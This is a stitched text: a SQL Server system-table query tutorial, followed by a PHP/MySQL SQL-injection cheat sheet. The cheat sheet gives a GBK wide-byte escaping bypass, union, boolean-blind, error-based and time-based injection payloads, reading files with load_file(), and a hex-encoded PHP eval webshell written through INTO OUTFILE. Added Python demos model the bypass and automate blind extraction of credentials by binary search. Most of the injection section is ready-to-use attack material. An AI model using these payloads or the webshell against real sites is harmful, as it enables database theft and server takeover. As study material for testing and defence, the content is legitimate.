In SQL Server, information about the databases can be obtained by querying the system tables under master (sysdatabases, sysobjects, syscolumns and so on) and the system views (INFORMATION_SCHEMA). The structure differs slightly between SQL Server 2000 and SQL Server 2005.
System table structure: refer to the detailed description of the system tables.
Information schema reference (MySQL manual): http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html
1. SQL Server 2000

System tables: most are prefixed with dbo.sys (sysobjects, syscolumns, sysdatabases, ...).
System views: about 20 common views, prefixed with INFORMATION_SCHEMA.
In SQL Server 2000 the two ways of querying give the same result.
For example, listing all databases:
SELECT name FROM master.dbo.sysdatabases
SELECT catalog_name FROM INFORMATION_SCHEMA.SCHEMATA
Both return the same list.
Listing only the databases created by users (those not owned by the sa login):
SELECT * FROM master.dbo.sysdatabases d WHERE sid NOT IN (SELECT sid FROM master.dbo.syslogins WHERE name = 'sa')
or
SELECT dbid, name AS db_name FROM master.dbo.sysdatabases WHERE sid <> 0x01
(0x01 is the sid of sa, so the system databases it owns are excluded.)
To list every database sorted by name:
SELECT name FROM master.dbo.sysdatabases ORDER BY name ASC
All user tables in the current database:
SELECT name FROM sysobjects WHERE xtype = 'U' AND status >= 0
SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_type = 'BASE TABLE'
All columns of a table:
SELECT name FROM syscolumns WHERE id = OBJECT_ID('table_name')
SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'table_name'
Views, stored procedures and functions whose definition references a table (syscomments holds the source text of the objects):
SELECT a.* FROM sysobjects a, syscomments b WHERE a.id = b.id AND b.text LIKE '%table_name%'
All stored procedures in the current database:
SELECT name AS procedure_name FROM sysobjects WHERE xtype = 'P'
Columns of a table together with their data types (in syscolumns, xtype is the numeric type id; INFORMATION_SCHEMA.COLUMNS gives the type name directly):
SELECT name, xtype FROM syscolumns WHERE id = OBJECT_ID('table_name')
SELECT column_name, data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'table_name'
2. SQL Server 2005

System tables: the 2000 system tables are kept, but in 2005 they are placed under the System Views folder (as compatibility views).
System views: hold both the system tables and the views; many new system views were added (XML support, for example), prefixed with sys.
In 2005 the system tables still belong to the master database, but the INFORMATION_SCHEMA views are scoped to each database. So:
SELECT name FROM master.dbo.sysdatabases
SELECT catalog_name FROM INFORMATION_SCHEMA.SCHEMATA
now return different results:
the first still returns the list of all databases;
the second only returns the schemas of the currently connected database.
Apart from this, operations within a specific database are the same as in 2000.
Because of the structural difference, use the system tables when working across the whole server, so that behaviour stays consistent; when working inside a specific database, either the system tables or the INFORMATION_SCHEMA views can be used.
Simple penetration testing notes (PHP + MySQL)

magic_quotes_gpc = On: applies addslashes() to request data, so ' " \ and NUL arrive prefixed with a backslash.
PS: intval() is used to sanitise numeric parameters.
register_globals = Off: request variables are no longer registered as global variables.
display_errors = Off: error messages are not shown.
GBK wide-byte bypass of magic_quotes_gpc = On: submit %f5' instead of '. After escaping the bytes are %f5%5c%27; a connection using the GBK character set reads %f5%5c as one two-byte character (鮘), so the quote is no longer preceded by a backslash and the string breaks out. Any valid GBK lead byte followed by %5c behaves the same way.
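To make the wide-byte mechanism concrete, here is an added Python example (not code from the original page) that models addslashes() at the byte level and then decodes the resulting query the way a GBK connection and a single-byte (latin1) connection would. The news table, the id parameter and the query string are assumptions made for the demo; the page's own example byte is %f5, and the classic %df is shown alongside it because any GBK lead byte followed by %5c behaves the same.

```python
# Added example, not from the original page: a byte-level model of PHP's
# addslashes() (what magic_quotes_gpc = On applies) and of how the resulting
# query is read by a GBK connection versus a single-byte one.
from urllib.parse import unquote_to_bytes

# Hypothetical page: $sql = "SELECT * FROM news WHERE id='$id'"
QUERY_PREFIX = b"SELECT * FROM news WHERE id='"


def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): a backslash before ' " \\ and NUL, byte by byte."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(raw_param: bytes) -> bytes:
    """What the PHP page sends to MySQL for the given raw GET/POST bytes."""
    return QUERY_PREFIX + addslashes(raw_param) + b"'"


def server_view(query: bytes, charset: str) -> str:
    """How the server tokenises those bytes under the connection charset.
    Invalid sequences are shown as U+FFFD, which does not matter here."""
    return query.decode(charset, errors="replace")


def quote_breaks_out(raw_param: bytes, charset: str) -> bool:
    """True when the attacker's first quote is not preceded by a backslash
    after decoding, i.e. the string literal is terminated early."""
    text = server_view(build_query(raw_param), charset)
    body = text[len(QUERY_PREFIX):-1]   # the attacker-controlled part (prefix is ASCII)
    i = body.find("'")
    return i >= 0 and (i == 0 or body[i - 1] != "\\")


def demo() -> dict:
    """Constructed inputs: the classic %df' prefix, the page's %f5' prefix,
    and a plain quote, each under a GBK and a latin1 connection."""
    samples = (
        ("%df", "%df%27%20or%201%3d1%23"),
        ("%f5", "%f5%27%20or%201%3d1%23"),
        ("plain", "1%27%20or%201%3d1%23"),
    )
    results = {}
    for label, encoded in samples:
        raw = unquote_to_bytes(encoded)
        for charset in ("gbk", "latin-1"):
            results[(label, charset)] = quote_breaks_out(raw, charset)
    return results


if __name__ == "__main__":
    raw = unquote_to_bytes("%df%27%20or%201%3d1%23")
    for cs in ("gbk", "latin-1"):
        print(cs, "->", server_view(build_query(raw), cs))
    for key, broke in demo().items():
        print(key, "breaks out" if broke else "stays escaped")
```

Run it directly to see both views of the same query bytes: under latin1 the backslash sits in front of the quote, under GBK it has been swallowed into the preceding character. The practical countermeasure is to stop relying on addslashes()/magic_quotes: use prepared statements, or at least an escaping function that knows the connection character set (mysqli_set_charset() followed by mysqli_real_escape_string()) so client and server agree on where a character begins.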
Findings from practice

Suppose id is a numeric column but the query quotes it, as in id='$id'. Submitting id=1 and 1=1 and id=1 and 1=2 both return the row for id=1: MySQL converts the string to a number and only the numeric prefix before the space is used, so the and 1=2 part never takes effect.
In that case test with id=1' and 1=1# versus id=1' and 1=2# to confirm the injection and build the SQL statement from there.
Reading PHP source with load_file(): the browser treats characters such as < as HTML, so the returned page does not show the code. Replace them first (HEX is the hex-encoded file path, written as 0x...):
replace(load_file(HEX), char(60), char(32))
union select 1,replace(load_file(HEX),char(60),char(32)),3
char(60) is <, char(32) is a space.
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
means the character sets on the two sides of the UNION differ; pass the value through unhex(hex()):
unhex(hex(parameter))
union select 1,unhex(hex(load_file(HEX))),3
Useful variables and functions:
@@hostname              database server hostname
@@version_compile_os    operating system type
@@basedir               MySQL installation directory
@@datadir               data directory
@@plugin_dir            plugin directory
@@group_concat_max_len  maximum length of a group_concat() result
user()                  current user
database()              current database
version()               MySQL version
concat(field1,0x7c,field2,0x7c,fieldN)  joins several values (0x7c is |)
group_concat(field)     lists all rows in one value
load_file('physical path of the file')  reads a file
Writing a webshell: <?php @eval($_POST['c']);?>  PS: on Windows write the path with / or \\; a single \ does not work.
and 1=2 union select 1,0x3c3f70687020406576616c28245f504f53545b2763275d293b3f3e,3,...,n into outfile 'physical path of the file'
(the hex value is the webshell above; INTO OUTFILE needs the FILE privilege, a writable directory under the web root, and is blocked where secure_file_priv restricts the path)
SELECT user,password,update_priv,file_priv FROM mysql.user   global privileges of each user
SELECT * FROM mysql.db   per-database privileges of each user
Boolean-based blind injection:
and (select count(*) from table)>0
and (select count(field) from table)>0
and (select length(field) from table limit n,1)>5
and (select ascii(mid(field,n,1)) from table limit n,1)>96
and substring(@@version,1,1)=5
Union-based injection:
order by n   (find the number of columns)
and 1=2 union select 1,2,3,4,5,6,7,8,9,n#   (find which columns are echoed on the page)
and 1=2 union select 1,2,table_schema,4,5,6,7,8,9,n from information_schema.columns group by table_schema limit n,1   query the nth database name
and 1=2 union select 1,2,table_name,4,5,6,7,8,9,n from information_schema.columns where table_schema=0x<hex database name> limit n,1   query a table name
and 1=2 union select 1,2,column_name,4,5,6,7,8,9,n from information_schema.columns where table_schema=0x<hex database name> and table_name=0x<hex table name> limit n,1   query a column name
and 1=2 union select 1,2,field,4,5,field,7,8,9,n from database_name.table_name limit n,1   query the account and password
Writing the names as hex (0x...) avoids quotes, which matters when magic_quotes_gpc is on.
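The boolean probes above (count, length and ascii(mid(...)) compared against a threshold) are what an automated extractor repeats for every character. The following Python example is added here and is not from the original page; it drives those probes with a binary search against a deliberately vulnerable query on an in-memory SQLite database that stands in for MySQL (so ascii()/mid() become SQLite's unicode()/substr()). The admin and news tables, their rows and the news.php-style id parameter are constructed for the demo.

```python
# Added example, not from the original page: boolean-based blind extraction
# with a binary search over the same length()/character probes the notes use.
# SQLite stands in for MySQL, so ascii(mid(x,n,1)) becomes unicode(substr(x,n,1)).
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a hypothetical admin table and the news table
    behind the injectable page."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO admin VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret!"), (2, "guest", "guest123")])
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.execute("INSERT INTO news VALUES (1, 'hello')")
    return con


class VulnerableApp:
    """Stand-in for a page like news.php?id=...: the parameter is concatenated
    into the query and the only feedback is whether a row was rendered."""

    def __init__(self, con: sqlite3.Connection):
        self.con = con
        self.requests = 0  # counts oracle queries so the cost stays visible

    def page_has_row(self, injected_id: str) -> bool:
        self.requests += 1
        sql = "SELECT title FROM news WHERE id=" + injected_id  # vulnerable on purpose
        return self.con.execute(sql).fetchone() is not None


def probe(app: VulnerableApp, condition: str) -> bool:
    """id=1 and (<condition>): the row comes back only when the condition holds."""
    return app.page_has_row("1 and (" + condition + ")")


def binary_search(app: VulnerableApp, subquery: str, lo: int, hi: int) -> int:
    """Return the integer value of the scalar subquery, assumed to lie in
    [lo, hi], using only '(subquery) > m' true/false probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(app, f"({subquery})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(app: VulnerableApp, column: str, table: str, row: int) -> str:
    """Recover one column of the row-th row (0-based, as in 'limit row,1')."""
    length = binary_search(
        app, f"select length({column}) from {table} limit {row},1", 0, 255)
    chars = []
    for pos in range(1, length + 1):
        code = binary_search(
            app,
            f"select unicode(substr({column},{pos},1)) from {table} limit {row},1",
            0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    app = VulnerableApp(make_db())
    print("admin table has rows:", probe(app, "(select count(*) from admin)>0"))
    for r in range(2):
        user = extract(app, "username", "admin", r)
        pwd = extract(app, "password", "admin", r)
        print(f"row {r}: {user} / {pwd}")
    print(f"{app.requests} requests in total")
```

Each character costs about seven requests instead of up to 127 with one-step comparisons, and the request counter shows exactly how many were needed. Against a real target the oracle would compare HTTP responses rather than call SQLite, and the probe strings would go back to MySQL's ascii(mid(field,n,1)) form.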
Offset injection (when the number of columns in the target table is unknown):
order by 10   the injected query has 10 columns
and 1=2 union select *,1,2,3,4,5,6,7 from admin   succeeds, so table admin has 3 columns
and 1=2 union select 1,2,3,4,5,6,7,8,9,id from admin   succeeds, so column id exists
and 1=2 union select *,1,2,3,4 from (admin as a inner join admin as b on a.id=b.id)   the self-join contributes 6 columns, so admin data occupies positions 1-6 and the constants fill 7-10
and 1=2 union select *,1 from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)   three copies contribute 9 columns, so admin data occupies positions 1-9
Error-based injection using MySQL's error echo (the floor(rand(0)*2) / group by duplicate-key trick):
+and+1=2+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(injected data statement))a+from+information_schema.tables+group+by+a)b#
+or+1=(select+1+from+(select+count(*),concat(floor(rand(0)*2),(injected data statement))a+from+information_schema.tables+group+by+a)b)#
The error "Duplicate entry '...' for key 'group_key'" then carries the value of the injected statement: rand(0) is evaluated again when the group key is inserted into the temporary table, so the same key is produced twice.
Injected data statements:
select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)
select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1
Time-based (delay) injection:
select benchmark(5000000,md5('test')) from user where id=1 and 1=1
select * from user where id=1 or 1=(select benchmark(5000000,md5('test')))
select if(ascii(substring(version(),1,1))<54,benchmark(5000000,md5('test')),0) from user where id=1 and 1=1
select * from user where id=1 or if(ascii(substring(version(),1,1))<54,benchmark(5000000,md5('test')),0)
ascii 54 is '6', so the delay fires only when the major version is below 6; a noticeably slower response confirms the condition. On MySQL 5.0.12 and later sleep(n) can be used instead of benchmark().
Querying system tables and system views under Master for database information and simple penetration testing